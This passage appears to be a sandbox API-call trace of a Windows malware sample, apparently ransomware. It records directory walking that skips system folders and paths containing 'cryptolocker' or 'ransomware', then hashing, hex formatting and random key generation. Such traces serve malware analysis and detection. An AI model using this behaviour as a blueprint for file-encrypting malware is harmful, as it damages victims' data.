StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\appdata\\local\\") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\boot\\") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\perflogs\\") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\programdata\\") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\drivers\\") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\wsus\\") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="crypt_detect") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="cryptolocker") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="ransomware") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="C:\\WINDOWS") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.397] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="C:\\Program Files") returned 0x0 [0090.397] GetProcessHeap () returned 0xe30000 [0090.397] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ae) returned 0xedc0f8 [0090.397] StrCpyNW (in: psz1=0xedc0f8, psz2="C:\\Users\\Public\\Videos", cchMax=1070 | out: psz1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0090.397] StrNCatW (in: psz1="C:\\Users\\Public\\Videos", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\Public\\Videos\\*") returned="C:\\Users\\Public\\Videos\\*" [0090.397] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec21f0 [0090.397] StrCmpW (psz1=".", psz2=".") returned 0 [0090.397] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.397] StrCmpW (psz1="..", psz2=".") returned 1 [0090.397] StrCmpW (psz1="..", psz2="..") returned 0 [0090.397] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.398] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.398] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.398] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0090.398] FindClose (in: hFindFile=0xec21f0 | out: hFindFile=0xec21f0) returned 1 [0090.398] GetProcessHeap () returned 0xe30000 [0090.398] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xedc0f8 | out: hHeap=0xe30000) returned 1 [0090.398] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0090.398] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0090.398] GetProcessHeap () returned 0xe30000 [0090.398] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xedac48 | out: hHeap=0xe30000) returned 1 [0090.398] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0090.398] FindClose (in: hFindFile=0xec26b0 | out: hFindFile=0xec26b0) returned 1 [0090.398] GetProcessHeap () returned 0xe30000 [0090.398] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeda7a8 | out: hHeap=0xe30000) returned 1 [0090.398] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0090.398] StrCmpW (psz1="Windows", psz2=".") returned 1 [0090.398] StrCmpW (psz1="Windows", psz2="..") returned 1 [0090.398] StrCpyNW (in: psz1=0xed39f8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0090.398] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0090.398] StrNCatW (in: psz1="C:\\", psz2="Windows", cchMax=1030 | out: psz1="C:\\Windows") returned="C:\\Windows" [0090.398] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\system32\\") returned 0x0 [0090.398] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.398] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\system\\") returned 0x0 [0090.398] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.398] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.398] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\appdata\\local\\") returned 0x0 [0090.398] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.398] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.398] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\boot\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\perflogs\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\programdata\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\drivers\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\wsus\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows", lpSrch="crypt_detect") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows", lpSrch="cryptolocker") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows", lpSrch="ransomware") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows", lpSrch="C:\\WINDOWS") returned="C:\\Windows" [0090.399] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 1 [0090.399] StrCmpW (psz1="Windows10Upgrade", psz2=".") returned 1 [0090.399] StrCmpW (psz1="Windows10Upgrade", psz2="..") returned 1 [0090.399] StrCpyNW (in: psz1=0xed39f8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0090.399] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0090.399] StrNCatW (in: psz1="C:\\", psz2="Windows10Upgrade", cchMax=1030 | out: psz1="C:\\Windows10Upgrade") returned="C:\\Windows10Upgrade" [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\system32\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\system\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\appdata\\local\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\boot\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\perflogs\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\programdata\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\drivers\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\wsus\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.399] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.400] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="crypt_detect") returned 0x0 [0090.400] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="cryptolocker") returned 0x0 [0090.400] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="ransomware") returned 0x0 [0090.400] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="C:\\WINDOWS") returned="C:\\Windows10Upgrade" [0090.400] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 0 [0090.400] FindClose (in: hFindFile=0xec21b0 | out: hFindFile=0xec21b0) returned 1 [0090.400] GetProcessHeap () returned 0xe30000 [0090.400] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 Thread: id = 19 os_tid = 0x1028 Thread: id = 20 os_tid = 0xfb0 Thread: id = 21 os_tid = 0x12f4 Thread: id = 22 os_tid = 0xd24 Thread: id = 23 os_tid = 0x12a8 Thread: id = 24 os_tid = 0x29c Thread: id = 25 os_tid = 0x11b0 Thread: id = 26 os_tid = 0x1158 Thread: id = 27 os_tid = 0x11f8 Thread: id = 28 os_tid = 0x122c Thread: id = 29 os_tid = 0x11c0 Thread: id = 30 os_tid = 0x1230 Thread: id = 31 os_tid = 0x11ec Thread: id = 32 os_tid = 0x4ec Thread: id = 33 os_tid = 0x12ac Thread: id = 34 os_tid = 0x115c Thread: id = 35 os_tid = 0x11bc Thread: id = 36 os_tid = 0x1298 Thread: id = 37 os_tid = 0x1160 Thread: id = 38 os_tid = 0x1190 Thread: id = 39 os_tid = 0xf80 Thread: id = 40 os_tid = 0xfac Thread: id = 41 os_tid = 0xf88 Thread: id = 42 os_tid = 0x12fc Thread: id = 43 os_tid = 0x13e8 Thread: id = 56 os_tid = 0xe78 Thread: id = 57 os_tid = 0x994 [0101.134] Sleep (dwMilliseconds=0xea60) [0112.292] GetTickCount () returned 0x1169746 [0112.292] GetProcessHeap () returned 0xe30000 [0112.292] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2080) returned 0xecab68 [0112.292] RegQueryValueExA (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0xecab68, lpcbData=0x795e97c*=0x2000 | out: lpType=0x0, lpData=0xecab68*=0x50, lpcbData=0x795e97c*=0x3d8) returned 0x0 [0113.049] GetProcessHeap () returned 0xe30000 [0113.049] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0113.049] GetTickCount () returned 0x1169a34 [0113.049] GetSystemTimes (in: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4 | out: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4) returned 1 [0113.050] GetCurrentProcess () returned 0xffffffff [0113.050] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4 | out: lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4) returned 1 [0113.059] CryptAcquireContextA (in: phProv=0x795e978, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x795e978*=0xed54c0) returned 1 [0113.071] CryptCreateHash (in: hProv=0xed54c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x795e97c | out: phHash=0x795e97c) returned 1 [0113.071] CryptHashData (hHash=0xec1930, pbData=0x859c10, dwDataLen=0x1cc, dwFlags=0x0) returned 1 [0113.071] CryptGetHashParam (in: hHash=0xec1930, dwParam=0x4, pbData=0x795e974, pdwDataLen=0x795e970, dwFlags=0x0 | out: pbData=0x795e974, pdwDataLen=0x795e970) returned 1 [0113.071] CryptGetHashParam (in: hHash=0xec1930, dwParam=0x2, pbData=0x795e998, pdwDataLen=0x795e974, dwFlags=0x0 | out: pbData=0x795e998, pdwDataLen=0x795e974) returned 1 [0113.079] CryptDestroyHash (hHash=0xec1930) returned 1 [0113.079] CryptReleaseContext (hProv=0xed54c0, dwFlags=0x0) returned 1 [0113.079] GetProcessHeap () returned 0xe30000 [0113.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0xed4530 [0113.079] wnsprintfA (in: pszDest=0xed4530, cchDest=4, pszFmt="%02x" | out: pszDest="03") returned 2 [0113.079] wnsprintfA (in: pszDest=0xed4532, cchDest=4, pszFmt="%02x" | out: pszDest="0e") returned 2 [0113.079] wnsprintfA (in: pszDest=0xed4534, cchDest=4, pszFmt="%02x" | out: pszDest="e0") returned 2 [0113.079] wnsprintfA (in: pszDest=0xed4536, cchDest=4, pszFmt="%02x" | out: pszDest="d3") returned 2 [0113.079] wnsprintfA (in: pszDest=0xed4538, cchDest=4, pszFmt="%02x" | out: pszDest="89") returned 2 [0113.079] wnsprintfA (in: pszDest=0xed453a, cchDest=4, pszFmt="%02x" | out: pszDest="88") returned 2 [0113.092] wnsprintfA (in: pszDest=0xed453c, cchDest=4, pszFmt="%02x" | out: pszDest="b0") returned 2 [0113.092] wnsprintfA (in: pszDest=0xed453e, cchDest=4, pszFmt="%02x" | out: pszDest="82") returned 2 [0113.092] wnsprintfA (in: pszDest=0xed4540, cchDest=4, pszFmt="%02x" | out: pszDest="4e") returned 2 [0113.092] wnsprintfA (in: pszDest=0xed4542, cchDest=4, pszFmt="%02x" | out: pszDest="fd") returned 2 [0113.096] wnsprintfA (in: pszDest=0xed4544, cchDest=4, pszFmt="%02x" | out: pszDest="b0") returned 2 [0113.096] wnsprintfA (in: pszDest=0xed4546, cchDest=4, pszFmt="%02x" | out: pszDest="7d") returned 2 [0113.096] wnsprintfA (in: pszDest=0xed4548, cchDest=4, pszFmt="%02x" | out: pszDest="b2") returned 2 [0113.096] wnsprintfA (in: pszDest=0xed454a, cchDest=4, pszFmt="%02x" | out: pszDest="d4") returned 2 [0113.096] wnsprintfA (in: pszDest=0xed454c, cchDest=4, pszFmt="%02x" | out: pszDest="52") returned 2 [0113.100] wnsprintfA (in: pszDest=0xed454e, cchDest=4, pszFmt="%02x" | out: pszDest="f5") returned 2 [0113.108] CryptAcquireContextW (in: phProv=0x795e6fc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x795e6fc*=0xed4998) returned 1 [0113.116] CryptGenRandom (in: hProv=0xed4998, dwLen=0x80, pbBuffer=0x795e710 | out: pbBuffer=0x795e710) returned 1 [0113.116] CryptReleaseContext (hProv=0xed4998, dwFlags=0x0) returned 1 [0113.131] GetProcessHeap () returned 0xe30000 [0113.131] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2bbc8 [0113.131] GetProcessHeap () returned 0xe30000 [0113.131] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6826388 [0113.135] GetProcessHeap () returned 0xe30000 [0113.135] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2be50 [0113.138] GetProcessHeap () returned 0xe30000 [0113.138] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6811db8 [0113.138] GetProcessHeap () returned 0xe30000 [0113.138] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2be50 | out: hHeap=0xe30000) returned 1 [0113.138] GetProcessHeap () returned 0xe30000 [0113.138] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6812060 [0113.138] GetProcessHeap () returned 0xe30000 [0113.138] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x488) returned 0xee8818 [0113.138] GetProcessHeap () returned 0xe30000 [0113.138] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6825cc8 [0113.138] GetProcessHeap () returned 0xe30000 [0113.138] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xf0daf8 [0113.138] GetProcessHeap () returned 0xe30000 [0113.138] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0113.138] GetProcessHeap () returned 0xe30000 [0113.138] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x68410a0 [0113.138] GetProcessHeap () returned 0xe30000 [0113.138] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2be50 [0113.138] GetProcessHeap () returned 0xe30000 [0113.138] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48c) returned 0x6874278 [0113.152] GetProcessHeap () returned 0xe30000 [0113.152] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0113.152] GetProcessHeap () returned 0xe30000 [0113.152] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9fd10 [0113.152] GetProcessHeap () returned 0xe30000 [0113.152] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6810328 [0113.152] GetProcessHeap () returned 0xe30000 [0113.152] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2be50 | out: hHeap=0xe30000) returned 1 [0113.152] GetProcessHeap () returned 0xe30000 [0113.152] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xed39f8 [0113.152] GetProcessHeap () returned 0xe30000 [0113.152] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6810328 | out: hHeap=0xe30000) returned 1 [0113.152] GetProcessHeap () returned 0xe30000 [0113.152] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0113.152] GetProcessHeap () returned 0xe30000 [0113.152] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9fe40 [0113.152] GetProcessHeap () returned 0xe30000 [0113.152] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0113.152] GetProcessHeap () returned 0xe30000 [0113.152] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0113.152] GetProcessHeap () returned 0xe30000 [0113.152] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.152] GetProcessHeap () returned 0xe30000 [0113.153] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.153] GetProcessHeap () returned 0xe30000 [0113.153] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x288) returned 0x6811b10 [0113.153] GetProcessHeap () returned 0xe30000 [0113.156] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9fe40 | out: hHeap=0xe30000) returned 1 [0113.156] GetProcessHeap () returned 0xe30000 [0113.156] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xef3600 [0113.156] GetProcessHeap () returned 0xe30000 [0113.156] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6811b10 | out: hHeap=0xe30000) returned 1 [0113.157] GetProcessHeap () returned 0xe30000 [0113.161] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0113.161] GetProcessHeap () returned 0xe30000 [0113.161] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0113.161] GetProcessHeap () returned 0xe30000 [0113.161] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0113.161] GetProcessHeap () returned 0xe30000 [0113.161] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0113.161] GetProcessHeap () returned 0xe30000 [0113.161] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0113.161] GetProcessHeap () returned 0xe30000 [0113.161] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0113.162] GetProcessHeap () returned 0xe30000 [0113.162] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0113.162] GetProcessHeap () returned 0xe30000 [0113.162] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0113.162] GetProcessHeap () returned 0xe30000 [0113.162] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0113.162] GetProcessHeap () returned 0xe30000 [0113.162] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0113.162] GetProcessHeap () returned 0xe30000 [0113.162] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0113.162] GetProcessHeap () returned 0xe30000 [0113.169] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0113.169] GetProcessHeap () returned 0xe30000 [0113.169] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.169] GetProcessHeap () returned 0xe30000 [0113.169] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.169] GetProcessHeap () returned 0xe30000 [0113.169] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0113.169] GetProcessHeap () returned 0xe30000 [0113.169] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0113.169] GetProcessHeap () returned 0xe30000 [0113.169] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0113.169] GetProcessHeap () returned 0xe30000 [0113.169] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0113.169] GetProcessHeap () returned 0xe30000 [0113.169] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0113.169] GetProcessHeap () returned 0xe30000 [0113.169] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0113.169] GetProcessHeap () returned 0xe30000 [0113.188] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0113.188] GetProcessHeap () returned 0xe30000 [0113.188] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0113.188] GetProcessHeap () returned 0xe30000 [0113.196] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0113.196] GetProcessHeap () returned 0xe30000 [0113.196] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0113.196] 